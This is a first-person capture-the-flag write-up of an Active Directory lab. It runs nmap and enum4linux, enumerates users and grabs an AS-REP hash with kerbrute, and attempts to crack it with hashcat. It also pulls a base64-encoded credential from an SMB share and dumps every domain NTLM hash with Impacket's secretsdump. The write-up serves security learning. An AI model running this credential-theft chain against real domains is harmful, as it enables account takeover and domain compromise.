Contents

1

Attacktive Directory

Alright this seems like a good next step for my journey, I know AD is used everywhere, I’ve even used it myself a few times for OIDC auth in-front of cloud applications. But, I’ve never interfaced with it directly and I know this is something I’ll need to know how to do - so let’s get to it!

Installing Impacket

$ git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
Cloning into '/opt/impacket'...
remote: Enumerating objects: 36, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 18881 (delta 14), reused 21 (delta 7), pack-reused 18845
Receiving objects: 100% (18881/18881), 6.26 MiB | 12.57 MiB/s, done.
Resolving deltas: 100% (14364/14364), done.

$ pip3 install -r /opt/impacket/requirements.txt
Ignoring pyreadline: markers 'sys_platform == "win32"' don\'t match your environment
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 2)) (1.15.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 3)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 4)) (3.9.7)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 5)) (20.0.1)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 6)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 7)) (0.9.3)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from -r /opt/impacket/requirements.txt (line 8)) (1.1.2)

$ cd /opt/impacket/ && python3 ./setup.py install
... Installs ...

Enumerate the DC Pt. 1

Alright, I do know what DC is Domain Controller. At least I have that going for me!

Well, It asks me to a popular enumation tool to reveal some information… To start I’m just going nmap this and see what’s going on there:

# sudo nmap -n -Pn -p- --script vuln 10.10.203.98
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-03 10:50 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Stats: 0:13:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:04 (0:00:00 remaining)
Stats: 0:15:23 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Stats: 0:16:13 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 11:06 (0:00:00 remaining)
Nmap scan report for 10.10.203.98
Host is up (0.12s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
|_sslv2-drown: 
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
|_sslv2-drown: 
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
|_sslv2-drown: 
3389/tcp  open  ms-wbt-server
|_sslv2-drown: 
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49669/tcp open  unknown
49673/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49679/tcp open  unknown
49684/tcp open  unknown
49696/tcp open  unknown
49814/tcp open  unknown

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Nmap done: 1 IP address (1 host up) scanned in 981.94 seconds

A quick search for how to enumerate windows AD, the first result is enum4linux which is the correct 1st answer.

Alright, I guess we should run that against the host then!

$ sudo enum4linux 10.10.203.98                                                                                                                                              255 ⨯
[sudo] password for kali: 
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar  3 10:52:23 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.203.98
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.203.98    |
 ==================================================== 
[E] Can\'t find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.203.98    |
 ============================================ 
Looking up status of 10.10.203.98
No reply from 10.10.203.98

 ===================================== 
|    Session Check on 10.10.203.98    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.203.98 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.203.98    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.203.98    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.203.98 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.203.98 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.203.98    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn\'t find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn\'t find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================= 
|    Share Enumeration on 10.10.203.98    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.203.98

 ==================================================== 
|    Password Policy Information for 10.10.203.98    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.203.98 using a NULL share

[+] Trying protocol 139/SMB...

	[!] Protocol failed: Cannot request session (Called Name:10.10.203.98)

[+] Trying protocol 445/SMB...

	[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[E] Failed to get password policy with rpcclient


 ============================== 
|    Groups on 10.10.203.98    |
 ============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.203.98 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[I] Found new SID: S-1-5-21-3591857110-2884097990-301047963
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-502 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.

S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.


 ============================================= 
|    Getting printer info for 10.10.203.98    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Wed Mar  3 10:56:54 2021

Alright so most of the answers in this section were obvious from the default output, however I don’t know why a top-level domain could cause issues…
samba.org:

In this scenario you would name your domain in the format of "domain.invalid.tld" such as "SAMDOM.local". Using an invalid top-level domain (TLD) such as .local or .internal used to be a very common practice. In fact all versions of Microsoft's Small Business Servers were configured to use a domain in the form of "domain.local". Since the .local TLD is officially reserved by ICANN, you can also be assured that no external DNS server will resolve this domain. However this style of name has a few major issues:

    The .local TLD is used by some zeroconf systems, most importantly Apple's Bonjour service. Using them together will not work correctly.

    Invalid TLDs, such as .local or .internal, will soon be unable to get SSL certificates from any of the major certificate providers. The CA/Browser Forum has decided that no certificates should be issued for these invalid domains starting November 1, 2015. In fact, you are now unable to purchase a certificate for these names if they expire after this date. This includes Subject Alternative Names (SAN) used within otherwise valid certificates (this is a very common configuration for Microsoft Exchange). While internal certificate authorities have no such restriction, having this option open to you is always a good thing.

    It is possible that the invalid TLD you are now using, could become a valid TLD in the future. While .local is reserved by ICANN, the TLD system is currently scheduled to undergo a vast expansion of the generic TLD (gTLD) it supports, from 22 to over a thousand new names. This trend is likely to continue.

For the same reason, names with other invalid TLDs should be avoided, including .internal and .lan

.local was the answer!

Enumerate the DC Pt. 2

We’re being instructed to use kerbrute to brute-force with a given username/password list. I guess this one is for learning purposes, but this is pretty lame in my opinion. A pruned username/password list?! Sigh…

Install kerbrute

┌──(kali㉿kali)-[~/scripts]
└─$ go get github.com/ropnop/kerbrute                                                                                                                                         100 ⨯
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/scripts]
└─$ make all  
make: *** No rule to make target 'all'.  Stop.
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/scripts]
└─$ kerbrute                                                                                                                                                                    2 ⨯
zsh: command not found: kerbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/scripts]
└─$ cd $GOPATH                                                                                                                                                                127 ⨯
                                                                                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ ls
config  Desktop  Documents  Downloads  go  Music  peda  Pictures  Public  result.txt  scripts  Templates  test.sh  tmp  t.sh  Videos  vpn  x.sh
                                                                                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cd go     
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go]
└─$ cd src    
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src]
└─$ ls
github.com  golang.org
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src]
└─$ cd github.com 
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ ls
hashicorp  jcmturner  op  ropnop  spf13
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com]
└─$ cd ropnop    
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ ls
gokrb5  kerbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/go/src/github.com/ropnop]
└─$ cd kerbrute 
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ mnake all
zsh: command not found: mnake
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ make all                                                                                                                                                                  127 ⨯
go: downloading github.com/op/go-logging v0.0.0-20160315200505-970db520ece7
go: downloading github.com/ropnop/gokrb5/v8 v8.0.0-20201111231119-729746023c02
go: downloading github.com/spf13/cobra v1.1.1
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/jcmturner/gofork v1.0.0
go: downloading github.com/jcmturner/dnsutils/v2 v2.0.0
go: downloading golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897
go: downloading github.com/jcmturner/rpc/v2 v2.0.2
go: downloading github.com/jcmturner/aescts/v2 v2.0.0
go: downloading github.com/hashicorp/go-uuid v1.0.2
go: downloading golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa
cd /home/kali/go/src/github.com/ropnop/kerbrute
rm -f kerbrute kerbrute.exe kerbrute.test kerbrute.test.exe main main.exe
rm -f /home/kali/go/bin/kerbrute
Done.
Building for windows amd64..
go: downloading github.com/inconshreveable/mousetrap v1.0.0
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
cmd/go: unsupported GOOS/GOARCH pair darwin/386
make: *** [Makefile:42: mac] Error 1
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kernbrute                                                                                                                                                                   2 ⨯
zsh: command not found: kernbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ kerbrute                                                                                                                                                                  127 ⨯
zsh: command not found: kerbrute
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ ls                                                                                                                                                                        127 ⨯
cmd  dist  go.mod  go.sum  LICENSE  main.go  Makefile  README.md  session  util
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/src/github.com/ropnop/kerbrute]
└─$ cd dist    
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls
kerbrute_darwin_amd64  kerbrute_linux_386  kerbrute_linux_amd64  kerbrute_windows_386.exe  kerbrute_windows_amd64.exe
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ kernel-install 
Not enough arguments
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ls -al                                                                                                                                                                      1 ⨯
total 37300
drwxr-xr-x 2 kali kali    4096 Mar  3 11:37 .
drwxr-xr-x 8 kali kali    4096 Mar  3 11:37 ..
-rwxr-xr-x 1 kali kali 7988312 Mar  3 11:37 kerbrute_darwin_amd64
-rwxr-xr-x 1 kali kali 7018814 Mar  3 11:37 kerbrute_linux_386
-rwxr-xr-x 1 kali kali 8153622 Mar  3 11:37 kerbrute_linux_amd64
-rwxr-xr-x 1 kali kali 7028736 Mar  3 11:37 kerbrute_windows_386.exe
-rwxr-xr-x 1 kali kali 7991296 Mar  3 11:37 kerbrute_windows_amd64.exe
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ ./kerbrute_linux_amd64 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user\'s password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string          The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int          Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string      The full domain to use (e.g. contoso.com)
      --downgrade          Force downgraded encryption type (arcfour-hmac-md5)
      --hash-file string   File to save AS-REP hashes to (if any captured), otherwise just logged
  -h, --help               help for kerbrute
  -o, --output string      File to write logs to. Optional.
      --safe               Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int        Threads to use (default 10)
  -v, --verbose            Log failures and errors

Use "kerbrute [command] --help" for more information about a command.
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ mv ./kerbrute_linux_amd64 /usr/bin/kerbrute
mv: cannot move './kerbrute_linux_amd64' to '/usr/bin/kerbrute': Permission denied
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo !!                                                                                                                                                                     1 ⨯
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/…/github.com/ropnop/kerbrute/dist]
└─$ sudo mv ./kerbrute_linux_amd64 /usr/bin/kerbrute                                                                                                                            1 ⨯
[sudo] password for kali:
$ cd ~ && which kerbrute
/usr/bin/kerbrute

Download the wordlists

$ cd ~ && mkdir tmp && cd tmp
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

$ ls -al
total 1292
drwxr-xr-x  2 kali kali   4096 Mar  3 11:40 .
drwxr-xr-x 30 kali kali   4096 Mar  3 11:39 ..
-rw-r--r--  1 kali kali 569236 Mar  3 11:40 passwordlist.txt
-rw-r--r--  1 kali kali 744407 Mar  3 11:40 userlist.txt

$ kerbrute userenum --dc 10.10.203.98 -d THM-AD  ./userlist.txt                                                                                                               1 ⨯

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 03/03/21 - Ronnie Flathers @ropnop

2021/03/03 11:43:03 >  Using KDC(s):
2021/03/03 11:43:03 >  	10.10.203.98:88

2021/03/03 11:43:03 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:05 >  [+] svc-admin has no pre auth required. Dumping hash to crack offline:
[email protected]:4715c0c49c0041ef374f45ed323315fd$b5ffae20417b39577f4f70fffb86280df075b8a030927c7e662d83cac8bb309fbc3f771eb77f0816cd379be1362cca367132befeee1d08f51d074e48bfc8e693c4d0096b7ed49e29e28a6d7b63b500d840c5681f4f6bb6e3c874f7fb11c3a0c28e924624298eb609b5c696541414b13d9eb15850fbe6b30ca1379a504694b1ccd847c31576c80cbc71db45263c4b492bd6d1ece1387d45540f47d8ab6ed8adb6b77c17d732c9183faa8a278f34dfb4da2e25df78ee55c819a4ad1cb2b702038f9adb7d0afe7222925d98b7f7ce6c4f53f7f432051133420748315c026d908834d3c1f70deb1388d6693d9eec271a16e25a48d8822eb458522560c25199
2021/03/03 11:43:05 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:07 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:08 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:16 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:22 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:33 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:43:38 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:44:10 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:44:21 >  [+] VALID USERNAME:	 [email protected]
2021/03/03 11:45:23 >  [+] VALID USERNAME:	 [email protected]

Alright time to crack that hash, I switched over to my Windows Host that can use my GPU:

C:\Users\matth\Desktop\Security\cracking\hashcat-6.1.1\hashcat-6.1.1>hashcat.exe -m 18200 -a 0 -o result.txt ..\..\hashes\1.txt  ..\..\wordlist\1.txt
hashcat (v6.1.1) starting...

* Device #1: CUDA SDK Toolkit installation NOT detected.
             CUDA SDK Toolkit installation required for proper device support and utilization
             Falling back to OpenCL Runtime

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.2.109) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: GeForce RTX 2080 Ti, 9664/11264 MB (2816 MB allocatable), 68MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1169 MB

Dictionary cache built:
* Filename..: ..\..\wordlist\1.txt
* Passwords.: 70188
* Bytes.....: 639424
* Keyspace..: 70188
* Runtime...: 0 secs

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23[email protected]:4715c0c49c0...c25199
Time.Started.....: Wed Mar 03 12:08:15 2021 (1 sec)
Time.Estimated...: Wed Mar 03 12:08:16 2021 (0 secs)
Guess.Base.......: File (..\..\wordlist\1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 56258.4 kH/s (0.38ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests
Progress.........: 70188/70188 (100.00%)
Rejected.........: 0/70188 (0.00%)
Restore.Point....: 70188/70188 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> pinkk
Hardware.Mon.#1..: Temp: 36c Fan:  0% Util: 48% Core:1965MHz Mem:6800MHz Bus:16

Started: Wed Mar 03 12:08:14 2021
Stopped: Wed Mar 03 12:08:16 2021

Enumerate DC Pt. 3

Now we’re told to enumerate smb shares with our known account…

We’re going to use smbclient to poke around real quick:

# List shares
$ smbclient -U svc-admin -L ///10.10.204.111                                                                                                                                  1 ⨯
Enter WORKGROUP\svc-admin\'s password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
# Poke at shares
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\ADMIN -U svc-admin                                                                                                                             1 ⨯
Enter WORKGROUP\svc-admin\'s password: 
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
                                                                                                                                                                                    
┌──(kali㉿kali)-[~/tmp]
└─$ smbclient \\\\10.10.204.111\\backup -U svc-admin                                                                                                                            1 ⨯
Enter WORKGROUP\svc-admin\'s password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

		8247551 blocks of size 4096. 3548545 blocks availabl
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/tmp]
└─$ cat backup_credentials.txt                                      
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw                                                                                            
┌──(kali㉿kali)-[~/tmp]
└─$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 --decode
[email protected]:backup2517860 

Elevating Privileges

We’re told to use secretsdump.py from IMPACKET to get password hashes using the credentials we found. Cool. (I hate these tutorial boxes I’m never doing one again, I enjoy the exploration… this feels like cheating…)

Anyway…

$ secretsdump.py backup:[email protected]
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
